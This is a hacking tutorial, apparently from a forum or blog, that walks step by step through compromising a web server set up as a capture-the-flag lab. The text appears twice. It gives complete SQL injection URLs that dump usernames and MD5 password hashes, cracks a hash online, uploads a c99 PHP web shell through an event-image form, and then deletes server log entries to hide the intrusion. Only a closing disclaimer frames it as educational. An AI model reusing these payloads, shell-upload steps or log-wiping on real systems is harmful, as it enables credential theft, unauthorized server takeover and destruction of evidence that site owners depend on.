Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: Hackerlaxu1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHivgxp2OerQXsnF6AOnDvU_QXeiCqEsAhw-OYIHiQIABm1edFlmOyR7EEI6vyzUqPAFQMI7M0oaA2TrSKlZy-vQJQ9_q5i6667vl7e5Cf6sRQetPGwS89Q8QBxF_Vd89PGu_boLLdrROAjbFGFb8DO5Fzx8UJGeakBN2ZlK1mKDi6=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: Hackerlaxu2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_to2HmJVv9jYw1Fbq86CQooctd9FXPgmstrUAFOEXBsIflGAuObPz6hY8vkLCiT2WCr9jtWorxo3g7bUo_FvLKHtU3ojIbaHRfUh37yyAfya9enDkr2wZle1ZKKqUY5VIRwOZ7xg74u6S2G823mqsyLBDyLndA9Mi1TSeyV1twCPohlhw=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: Hackerlaxu3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uPhGkIdf8ya8XO0f_6UtdSWSlArxYhF4KykEegvAqfM-1rwaGa7WBmckIvjeNIois0ozP_qTpEn8QP5lV4CTzfwkyvzKzoMv1f74nZstebRI21rgFtNwVcHxgmfZsIfLhMQOggJYWJQGrnfVEJMA1tNKu68qs2mjiguKhrdj-PNcAyNw=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: Hackerlaxu4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vwTtQATk-452vGpVXUFxoJG_60jRIVIkZc0l8YIv867Q0SjwsTXFSziGGxIcJOpqSIDFnJuXCg19qnszROaIyDrfD7yoXtCWJ-n65P4laOU20JlMFn8egzISQofvQF2Mp4o0IRegDmmqw7oWimu9XXLYr3vmxiuzIijbymr_vgKHoAGA=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: Hackerlaxu6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vXk9DgicT_aKDT_iTTPgzE1KPFdw6w61KibbgdnZ9TQJHlopWgQnHUwqLSsPWB9JwTljN9cNJAmhCZ7MxCLvrGI1MDqK1q0fGxVnkZA9Nb63CvegoxqtrcYO1M_RUkf0HZnA35LFfSXsOzAE5nfQlRY7Ge2KK7ilKxv2R1g5_MTfW3Aw=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: Hackerlaxu7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_smFDRCFfPR33JTHOlkYasdfDKNblhX6C8wZxJmncJ2tPXh09L6pxghNDtTibNqFpA5zKFfvNCyNexDWJQagtvX9q8Zgc0o_Q9AZDDQxfzVZ6ETKmE88LJEDdd0y8K6jeXxoADOQEyMMtSbdg-Ebf3cCEg0akYTfjVtzC0twOhHk0oS=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: Hackerlaxu12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tzb1tSOoLFp5MoDfwA04Rq42jslEnzzb6ZUQi-bMHhNGpnWDI0j1MoGunl26mHXb4x2I-mj4QD6ij2nUP9wCymSjout5LWBhPrjropKgGkbdEWSo1W9mc7mWSBNxIXgdXi9_duy6cONoEDXXBbX_yG9KNl75FCIhkgvKgXsCpQFa8yyRY=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: Hackerlaxu13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t0OmM_h1Ruu2Sz69f6xnS2RQDAcRq6zTSTYVZrjnEVFHLNvAq8ZxqRVzjGwBQmDuJzS2IzM5lQSMkevMGWGdEv9H2wFQ8rniA_h7mGGSGAskTwjHw2YD4x6tGnNL_dyracdjio0FYxBGEFQ_uVB9cjsOrYFNEYxAKvHZM56tSgg9hNP_s=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: Hackerlaxu14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s1_AMXV3Jvfa6Q8o3xs0u0kI4lfLJq-vXf78-tNCQDC8u0jCmXpZsMwjApErUVPBUDZM8NQXP1SGGooDwnOHziQ9MqU3h372qBKqQRSEP--5RYr0i6gpJGuog8a-UorclNc2Dz-bi8JPqX-BTIz4NZdOUk3jueFQyz47sXjteydEmRQkM=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: Hackerlaxu16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t4_dLdqUakrug8hNvEVCWsGl18cQoL33p8VWt73Mi05ouSmOXUxXt_GyPECcEjBedgR7yTitt3J_2yF8aef6LjMNoRWpQr0TbPwHhonKrONRPF3RfW7hBNMyOaTaXz_idTFQw-T4Zh9nAej65ZF7bg2PDhPHdfYComixerv9pA2gPT_-c=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: Hackerlaxu19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxP7p0XVpJ1wvUOACrRg0GyYWNNkp0fwe4KWkGHBOchJYW8GwPhP9_37p9Yr2Je5uqFMa7mbABHY2K2RuTST3f27HBFV3f2aiTcpAtlXqo6CL7_f624xYBITrOERL1cpBX4Lp2YSPVntt-if6TqKfq9P-68-GihqBQs4UnJgrJbXEizg=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: Hackerlaxu21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tiHtCCdDCxerEu-VjVWO5_sbSOSJhCBzBKpCfqZM-4DZR2jajo0JlRbMFs9B-slaxz5FJSsetjI1Rk8H942pGtRB8ezDBTeimfXgNqhKt8j-KNUHqTzFJ-JMmefrDc-6t0CoCJn6QZuPH_BYk6zVaz0cmY0iJdif3ln-rUnMfyUwNKUeM=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: Hackerlaxu22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u60zsTS6GIYqK2keqkc04UWYxn_qShhBZQocjDqJTjz7xwLi2aGGUyI6x1AYPiB-VmT2focuE7oMq1fCIR8o4hYDHbhfmEVXY4QPMaf3GJu-rAp--MOKFQEXeCSEoHhTBF33j8hgigPZmt0GyQIT8Nu-HroWfQOxMLo0l_wpFTYunhWWs=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: Hackerlaxu23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sQOH-INmkvv7PZ3U8es9P-LvRf9o1n3EXDjf4tZZO0h5Rb_8B29EK8u7G174DNEll5TPJGwumiR0F8J8m-BSEhpgoJR_qlONKByH2mSDvU0u5ZMls5qIX9KhU3WDzMSeIWe9cXMbVa2idjehQ4eNzDMGrP12ajV0brXE3E9NbQjuomFQ=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: Hackerlaxu24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u7VXVX2NOaHU8FZqkH3UocZIiTHs-qK1MtIrsWr5i3F6sjnPIDuuJ7jy3SHMUM6FdKR9IspM3RJYhTnLGiNiJafk4q_oCuBMJ0z3w5Pph0wqokG07zHRQeVLE23AeikyN3dUh1IsRlTpqOF9TcI0Q_kzCLF5NQFESCB7-UpzUgCHD7aQ=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: Hackerlaxu25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sTR8rUGva77e_Bz0y_JOatvFhwo5BW60kSGQ8eVG9_9Ascxfq1ws34ldOLpdaxDecN6UyyuNvkIFVrQJQgjpHFUZYnRVe5DjDApuzIqamw_GoKts6W8-Xyed5w8eY4gBZ15Z8XkibCq6zcgldfL9TixnQCBhG6zooA66BLjU4alqv8ucU=s0-d)
Step 17:
Lets find the user name
![[Image: Hackerlaxu27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0pafh3lt2HwlVkbvsQChXKAJ6Ohog1tNI0RDs3Aw4cKlCaEC2Esd3hrICWDCsReOh3FcV8EB3gdG7vs9CLjtqzPQW2lox65LKqtHFdNlijdC1l2bVFmuxz0tkF4dOVkYSIK2uxi11LKvcUqIXz_fnLLFc9NlxBhCpSo0_PdZs65VRvSw=s0-d)
Step 18:
Now, what about password
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
Code:
http://192.168.132.128/Step 2:
I went through all the pages of web site and found a page with URL input
Code:
http://192.168.132.128/?id=13Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
Code:
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
Code:
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
Code:
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
Code:
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
Reference:
1. Infond tutorial
Happy Hacking.!!!
======================================================================
Note: This tutorial is only for
Educational Purposes, I did not take any responsibility of any misuse,
you will be solely responsible for any misuse that you do. Scanning
Server & Web Hacking is criminal activity and is punishable under
cyber crime and you may get upto 40 years of imprisonment, if got
caught in doing so.
